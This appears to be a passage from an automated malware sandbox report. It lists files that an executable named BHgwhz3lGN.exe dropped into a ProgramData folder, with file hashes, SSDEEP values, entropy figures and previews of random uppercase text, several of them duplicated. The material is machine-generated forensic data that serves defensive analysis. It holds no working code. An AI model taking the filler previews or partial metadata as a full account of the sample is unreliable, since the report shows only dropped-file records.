                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\n7y58q

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\o8qq16

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\opz5fu

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\p8y58g

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\s0zm7q

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\sriwln

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\tr1ng4

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.690067217069288
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                                                                                                                                                                                                          MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                                                                                                                                                                                                          SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                                                                                                                                                                                                          SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                                                                                                                                                                                                          SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\uk6f3e

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\wlfctj

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
